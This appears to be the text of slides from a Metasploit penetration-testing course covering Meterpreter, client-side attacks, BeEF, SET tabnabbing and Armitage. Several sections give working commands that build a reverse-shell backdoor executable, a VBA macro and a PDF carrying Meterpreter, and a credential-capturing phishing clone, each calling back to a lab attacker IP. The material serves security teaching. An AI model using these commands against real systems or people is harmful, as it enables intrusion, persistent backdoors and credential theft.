Penetration Testing

METASPLOIT

with

Course Introduction

Course Outline
Introduction to Penetration Testing

Armitage

Setting up Penetration testing Lab

Social Engineering Toolkit

Metasploit 101

PowerSploit

Meterpreter
Writing custom meterpreter scripts
Client side attacks
Exploiting client side vulnerabilities
Exploiting Browser based vulnerabilities
Post exploitation

Introduction to
PENETRATION
TESTING

Introduction to Penetration Testing

Penetration testing a method of evaluating the security of a computer system or network by simulating an
attack

Importance
Penetration tests are valuable for several reasons
Determining the feasibility of a particular set of attack vectors
Identifying higher-risk vulnerabilities which could lead to security breach
Identifying vulnerabilities
Testing the ability of network defenders
Providing evidence to support increased investments in security personal and technology

Penetration Testing Execution Standard

PTES ( Penetration Testing Execution Standard)
Aimed to provide security standards for business organizations and security service providers
Laid standard for performing penetration test (Beta)
.
Penetration Testing Execution Methodology
Pre-engagement Interactions
Intelligence Gathering
Threat Modeling
Vulnerability Analysis
Exploitation
Post Exploitation
Reporting
Source : http://www.pentest-standard.org/

Pre-Engagement Interactions

Mainly involves with client interaction

Engagement Interactions
Agenda focuses on Penetration testing Road Map
Questionnaires
Payment Terms

Intelligence Gathering
Main attribute is reconnaissance( Information Gathering ) in Penetration Test
Reflects other stages of Penetration Testing
Different tools and scripts will be used for different platforms for Information Gathering

Threat Modeling
Depends on Intelligence gathered information and the pre-engagement information
Methodology
Business Asset Analysis
Business Process Analysis
Threat Agents/Community Analysis
Threat Capability Analysis
Motivation Modeling
Finding relevant news of comparable Organizations being compromised

Vulnerability Analysis
Involves in discovering flaws in target system
Different tools and scripts will be used for performing vulnerability analysis on different platforms
Threat level classification need to be created for exploitation phase
Priority should be given for threat level, need to analyze and exploit threats
Directly reflects in exploitation phase

Exploitation
Completely depends on vulnerability analysis phase & mainly focus on target exploitation.
Exploits target with appropriate exploit & with compatibility check
Pentester need to evade security systems, need to bypass and trigger the exploit for successful exploitation

Post Exploitation
Involves extending attack
Pen-tester can analyze further information during post exploitation
Might include juicy information
Using post exploitation phase attacker can enhance his persistency over the compromised system

Reporting
Consists of Penetration testing executive summary and technical report.
Executive summary mainly focuses on threat level severity, general findings, recommendation summary and road map
Technical report carries out how vulnerability analysis, exploitation and post exploitation has done
Based on reporting technical team can further move towards patch management.

Setting up
PENETRATION
TESTING
Lab

Setting up Penetration Lab

Will be focusing on creation of our own virtual test beds & third party ones
Every Test Bed is been added with multiple vulnerabilities
Everything will be on safe side (No Loss)
Running with different set of operating systems with different set of configurations with added vulnerabilities

Lab Setup Overview

Virtualization
Virtualization, in computing, refers to the act of creating a virtual (rather than actual) version of something, including but
not limited to a virtual computer hardware platform, operating system (OS), storage device, or computer network
resources. --Wikipedia
Requirements for creating virtualization environment

Virtualization software (Virtuabox, Vmware, Hypervisior)

RAM(Minimum 4GB)
Virtual Test beds or Operating systems installer iso images
Good processer above 2.8GHz

Buzz Words
Host Operating system

The main operating system which got installed in a computer system

Guest Operating system

Any operating system which got installed by using virtualization software

Snapshot

Clone

Saving state of a virtual machine

Copy state of a virtual machine

Installing and Setting up Virtual Lab

Snapshot and Cloning

METASPLOIT 101

Metasploit 101
Introduces Metasploit Framework
Buzzwords, Architecture, Framework Architecture, Interfaces and Modules
Scope for exploiting target vulnerability using in built exploits and payloads

Buzz Words

Vulnerability

Weakness existed in a system which could be compromised.

Exploit

Code which works on the target vulnerability system.

Payload

Actual Code that lets an attacker to gain access after

exploitation

Penetration Testing using Metasploit

Widely used Tool for Development and Testing Vulnerabilities
Buzzing word security community
Used for Penetration Testing
IDS signature development
Exploit Development

Why we need Opt Metasploit

Widely accepted tool for the Testing vulnerabilities
Makes complex tasks more ease
Posses rich set of modules organized in systematic manner
Has Regular updates
Contains different types 1000 + exploits , 200 + Payloads, 500+ Auxiliary Modules

Metasploit Architecture
Libraries
TOOLS

Interfaces

REX

Console
CLI

MSFCORE

PLUGINS

WEB
GUI

MSF BASE

Armitage

Modules
PAYLOADS

EXPLOITS

ENCODERS

POST-Mods

Auxiliary

Exploits
Actual code which works on the target vulnerability system.
MSF has modular organization of exploits based on OS and service classification
Exploit Ranking Values
1. ManualRanking
2. LowRanking
3. AverageRanking
4. NormalRanking
5. GoodRanking
6. GreatRanking
7. ExcellentRanking
Source : https://dev.metasploit.com/redmine/projects/framework/wiki/Exploit_Ranking

Exploits Ranking
1. ManualRanking : Exploit is so unstable or difficult to exploit and is basically a DoS
2. LowRanking

: Exploit is nearly impossible to exploit (or under 50%) for common platforms

3. AverageRanking : Exploit is generally unreliable or difficult to exploit, then AverageRanking should be used
4. NormalRanking : Exploit is otherwise reliable, but depends on a specific version and can't reliably
auto-detect
5. GoodRanking

: Exploit has a default target and it is the "common case" for this type of software

6. GreatRanking

: Exploit has a default target AND either auto-detects the appropriate target or uses an
application-specific return address AFTER a version check

7. ExcellentRanking: Exploit will never crash the service

Source : https://dev.metasploit.com/redmine/projects/framework/wiki/Exploit_Ranking

Payloads
Payloads

Singles
Self contained ones does specific task

Stagers
Bridges connection Establishment

Stages
payload components that are downloaded
by Stagers modules

Post Exploitation
Critical component of penetration test.
Assist pen tester to gather information about exploited system.
Enhance attack in the targeted environment

Can be extended in pivoting stage

MSF has inbuilt and external scripts to perform Post Exploitation
Varied for Different OS types

Auxiliary Modules
MSF Auxiliary contains wide variety modules related to different services used for doing specific tasks

Auxiliary Modules
admin
crawlers
scanners
fuzzers
sniffers ....

Example : Scanning for available directories existed in webserver

MSF Tools and Plugins

MSF contains inbuilt and third party tools for which are widely used during regular Pentests during runtime
Importing Nessus scan report, later which can be used for launching attack based on report
Inbuilt MSF tools comes handy especially during post exploitation phase
Ex: memdump

MSF Tools

MSF Plugins

MSF Interfaces

Console

Armitage

WEB

CLI

GUI

Present Scenario

If exploit and payload gets executed

Meterpreter

Meterpreter

Meterpreter
Meterpreter >
Its a default Goto Payload for Windows
Provides Enhanced Command Shell for the attacker
Consists of default set of core commands
Can be extended at runtime by shipping DLLs on the Victim machine
Provides basic post-exploitation API

Working of Meterpreter
Getting a Meterpreter shell undergoes 3 different stages

sends exploit + Stage 1 Payload

sends DLL injection payload

Meterpreter DLL starts communication

Working with Meterpreter

Covers usage of Meterpreter

Meterpreter basics
Core Commands
File System Commands
Networking Commands

System Commands
User Interface Commands

Launching Attack
Stage : 1 Creating Executable Backdoor
msfpayload windows/meterpreter/reverse_tcpLHOST=192.168.206.159 LPORT=44444 X >/var/www/evil.exe
root@kali:# apachectl start
Stage : 2 Enabling listener to connect back to attackers machine
root@kali:# msfconsole
msf > use exploit/multi/handler
msf > set payload windows/meterpreter/reverse_tcp
msf > set LHOST 192.168.206.159
msf > set LPORT 44444
msf > exploit

Present Scenario

If exploit and payload gets executed

Core Commands

File System Commands

Networking Commands

System Commands

User Interface Commands

Client Side Attacks

Client Side Attacks

Introduction to Client Side Attacks

Targets on exploitation of client side vulnerabilities
Crack perimeter from the client side work environment
Includes :

Email
Java
Office suite
3rd party applications
Browsers
Whole agenda focus on client side exploitation :Client side software's
Exploiting Vulnerable services
Exposed to Hostile Servers

Lab Environment

Contains different set of Operating systems

Preconfigured and added vulnerabilities
Scenario based

Different stages
Security levels
Goal is to Pwn

Agenda
Exploiting :
Software based vulnerabilities
Web based vulnerabilities
Browser based vulnerabilities

Introduction to Client Side Attacks

Level

PATCHED

ANTIVIRUS

FIREWALL

STAGE 1

NO

NO

NO

STAGE 2

NO

NO

YES

STAGE 3

NO

YES

YES

STAGE 4

YES

YES

YES

Stage -1
Level

PATCHED

ANTIVIRUS

FIREWALL

STAGE 1

NO

NO

NO

Stage -1
Level

PATCHED

ANTIVIRUS

FIREWALL

STAGE 1

NO

NO

NO

Attacker creates a Backdoor and deploys on unprotected system, where

Anti Virus : Absent
Updates : Absent
Firewall

: Absent

Stage -1
Level

PATCHED

ANTIVIRUS

FIREWALL

STAGE 1

NO

NO

NO

Stage : 1 Creating Executable Backdoor

msfpayload windows/meterpreter/reverse_tcpLHOST=192.168.206.159 LPORT=44444 X >/var/www/evil.exe
root@kali:# apachectl start
Stage : 2 Enabling listener to connect back to attackers machine
root@kali:# msfconsole
msf > use exploit/multi/handler
msf > set payload windows/meterpreter/reverse_tcp
msf > set LHOST 192.168.206.159
msf > set LPORT 44444
msf > exploit

Time for Demo

Victim
Attacker

Exploiting Client Side

Vulnerabilities

Exploiting Client-Side Vulnerabilities

Agenda
Introduction to MSF Payloads

Exploiting MS-Office suite programs using custom macros

Msfpayload, Msfencode, Msfvenom

Exploiting word and PDF documents

Introduction to Binary payloads

Introduction to veil frame work

Creating custom Binary payload types

Analyzing custom Binary payloads using Veil framework

File Format Exploits

Porting exploits and exploiting client side vulnerabilities

Encoding payloads into VBA code

Making persistent backdoors

Introduction to MSF Payloads

MSF contains different payloads with different set of options
Inbuilt with custom set of commands
Everything depends on payload suppleness

Focus on Exploit development and Exploitation on different OS platforms depending on

vulnerability existence.

Msfpayload, Msfencode, Msfvenom

Msfpayload
Msfpayload module is used for creating custom executables, shellcode generation in different formats.

Msfencode
Shellcode generated by msfpayload contains null characters, shellcode which is deployed or else passing in a
network Might lead to AV / IDS & IPS detection. Msfencode module helps in avoid of bad characters.
Msfvenom
Msfpayload

Msfencode

Msfvenom

Binary Payload
Developed by using msfpayload
Requires bit of social engineering

Attacker need to create an exe file and send it to victim machine

On attacker side listener should be enable
When ever victim opens up exe connection gets establishes

DEMO
Stage : 1 Creating Executable Backdoor
msfpayload windows/meterpreter/reverse_tcpLHOST=192.168.206.159 LPORT=44444 X >/var/www/evil.exe
root@kali:# apachectl start
Stage : 2 Enabling listener to connect back to attackers machine
root@kali:# msfconsole
msf > use exploit/multi/handler
msf > set payload windows/meterpreter/reverse_tcp
msf > set LHOST 192.168.206.159
msf > set LPORT 44444
msf > exploit

Exploiting File Format Vulnerabilities

Users desktop environment contains various software applications and networking services
Might contain outdated application or poorly configured security services
Client side exploitation can be easily done by using any one of the following :

Email
Java
Office suite
3rd party applications
Browsers

Exploiting MS-Office Suite Programs

Shellcode execution in MS-Office Macros

Stage : 1 Creating shellcode + payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST= 192.168.159.132 lport= 443 -e shikata_ga_nai -i 5 -f vba > vba.txt
Stage : 2 Enabling listener to connect back to attackers machine
root@kali:# msfconsole
msf > use exploit/multi/handler
msf > set payload windows/meterpreter/reverse_tcp
msf > set LHOST 192.168.159.132
msf > set LPORT 443
msf > exploit

Exploiting PDF Documents

Exploiting PDF Documents

Msf>use exploit/windows/fileformat/adobe_pdf_embedded_exe
Msf>set payload windows/meterpreter/reverse_tcp
Msf>set LHOST 192.168.159.132
Msf>set LPORT 4444
Msf>set INFILENAME /root/password.pdf
SHARE THE PDF FILE WITH VICTIM
Msf>use exploit/multi/handler
Msf>set payload windows/meterpreter/reverse_tcp
Msf>set LHOST 192.168.159.132
Msf>set LPORT 4444
Msf>exploit

Exploiting

Software Based
Vulnerabilities

Exploiting Software based Vulnerabilities

Agenda

Introduction to software based vulnerabilities

Analyzing how to exploit fully patched system
Analyzing and exploiting software vulnerabilities

Introduction to software based vulnerabilities

Targets on exploitation of client side vulnerabilities
Crack perimeter from the client side work environment
Whole agenda focus on client side exploitation :Client side software's

Exploiting Vulnerable services

Source : http://www.exploit-db.com/

Analyzing how to exploit fully patched machine

Le v e l

P A T C H ED

A N T I VI R U S

FI R E W A L L

STAGE 1

NO

NO

NO

STAGE 2

NO

NO

YES

STAGE 3

NO

YES

YES

STAGE 4

YES

YES

YES

Analyzing how to exploit fully patched machine

Lets check for any vulnerable service running on the victims machine
We will exploit core software based vulnerabilities

Victim Environment

Analyzing and Exploiting Vulnerability

Analyzing and Exploiting Vulnerability

Exploiting

Browser Based
Vulnerabilities

Exploiting Browser based Vulnerabilities

Agenda
Introduction to browser based vulnerabilities
Exploiting browser based vulnerabilities using Metasploit
Introduction to Browser Exploitation Framework (BeEF)
Installing and Configuring Beef on attacker machine
Exploiting browser based vulnerabilities using BeEF

Introduction to Browser Attacks

A browser exploit is a form of malicious code that takes advantage of a flaw or vulnerability in an
operating system or piece of software with the intent to breach browser security to alter a user's browser
settings without their knowledge. Malicious code may exploit ActiveX, HTML, images, Java, JavaScript,
and other Web technologies and cause the browser to run arbitrary code.

-- Wikipedia

Exploitation Browser Vulnerabilities using MSF

User environment might be running with outdated browser
Victim need to browser attackers shared url
Once the victim navigates attacker Url victims machine will gets exploited and connection establishment takes place

Exploitation Browser Vulnerabilities using MSF

Exploitation Browser Vulnerabilities using MSF

Exploitation Browser Vulnerabilities using MSF

Exploitation Browser Vulnerabilities using MSF

Browser Exploitation Framework (BeEF)

Open source tool for testing and exploiting web application and browser-based vulnerabilities
Testing and exploitation will be done from client side

Features
BeEF's modular framework allows addition of custom browser exploitation commands.
The extension API allows users to change BeEF's core behavior.
Keystroke logging
Browser proxying
Integration with Metasploit
Plugin detection
Intranet service exploitation
Phonegap modules
Hooking through QR codes
Social Engineering modules spur user response such as entering sensitive data and responding to reminders to update
software
Restful API allows control of BeEF through http requests (JSON format).

Source: http://en.wikipedia.org/wiki/BeEF

Browser Exploitation Framework (BeEF) Architecture

BeEF Project

Installing and Configuring BeEF

root@kali: apt-get update
Installation

root@kali: apt-get install beef-xss

Edit config.yaml & set Metasploit : true
vi /usr/share/beef-xss/config.yaml
vi /usr/share/beef-xss/extensions/metasploit/config.yaml

Configuring

Launching

Add kali linux IP at line 18 and 26

host: "192.168.159.132"
callback_host: "192.168.159.132"
Add msf framework path at line 37
{os: 'custom', path: '/usr/share/metasploit-framework/'}
msf> load msgrpc ServerHost=192.168.159.132 Pass=abc123

root@kali: cd /usr/share/beef-xss/
root@kali: /usr/share/Metasploit-framework/./beef

beef
beef

Time for Demo

Social Engineering
Toolkit

S.E.T.

Social Engineering Toolkit

Agenda
Introduction to social engineering
Introduction to SET

Installing and Configuring Social Engineering Toolkit

Working on SET modules and Launching Attacks using SET

Social Engineering

The human factor is truly securitys weakest link

Kevin Mitnick

Motivation
Self Interest
Mr.X, want to access and/or modify information that is associated with a family member, colleague or even a neighbor.

Revenge
Mr.X, target a friend, colleague, organization or even a total stranger to satisfy the emotional desire for vengeance

Curiosity
Mr.X, receiving pressure from friends, family or organized crime syndicates for reasons such as financial gain,
self-interest and/or revenge

The Root Cause

People want to be helpful
Sometimes the help goes too far and they give away too much information.
People want to avoid confrontation
It's difficult for some people to ask others to prove who they are. They don't want confrontation.
People like convenience
No one wants to be put out by additional security even though it may benefit the organization.
People are messy
By nature, they leave paper around, copy multiple people on e-mail, and leak data.
People are curious.
A great example is an employee who finds a USB drive in the parking lot. The first thing they do when they get to
their desk is plug it in to see what's on it.
People appeal to the senses.
Building relationship with sweet voice.

Life Cycle of Social Engineering

Introduction to SET
Social-Engineer Toolkit (SET) created and written by the founder of TrustedSec, Dave Kennedy

Focuses exploiting human weakness

Interfaces :
Command line
Web

Introduction to Command-line Interface

Introduction to Web Interface

Working on SET modules & launching attacks using SET

Performing Tabnabbing attack using SET
Tabnabbing Attack

Introduction to Tabnabbing
"It can detect that you're logged into Citibank right now and Citibank has been training
you to log into your account every 15 minutes because it logs you out for better security.
It's like being hit by the wrong end of the sword.

Aza Raskin
http://www.azarask.in/blog/post/a-new-type-of-phishing-attack/

Behind Curtains
Attacker user customized scripts and hosting service to pretend it as a original page.
How to do it
Index1.html
Index2.html
Tabnab.js

Log.txt

script.php

Script.php

Log.txt
Hosting site

Script.js
Index-2.html
Index-1.html

Tabnabbing using SET

root@kali:/cd /usr/share/set/
root@kali:/usr/share/set/ ./settoolkit
1.Social Engineering Attacks
2.website Attack vectors
2.website Attack vectors
4. Tabnabbing
2. Site Cloner
Enter Attackers IP
Enter the url to clone
Victim should open attackers url and need to switch to new tab. What ever the tab opened in back will get refreshed and loads
Phishing page. If victim supplies credentials over there it will post back to Attackers machine

Captured Credentials

Armitage

Armitage
Agenda
Introduction to Armitage
Installing and configuring Armitage
Host Management
Dynamic Workspaces
Importing Hosts
Scanning and exploiting targets
Exploit Automation

Introduction to Armitage
GUI front-end for the Metasploit Framework developed by Raphael Mudge

Installation and Configuring

Kali Linux ships with inbuilt armitage and all the dependencies.
root@kali: service postgresql start
root@kali: service metasploit start
root@kali: armitage

Launching Armitage

Launching Armitage

Launching Armitage

Armitage UI

Adding Host

Adding Host

Scanning Host

Finding Attacks

Finding Attacks

Finding Attacks

Launching Attack

Launching Attack

Compromised System

Thank You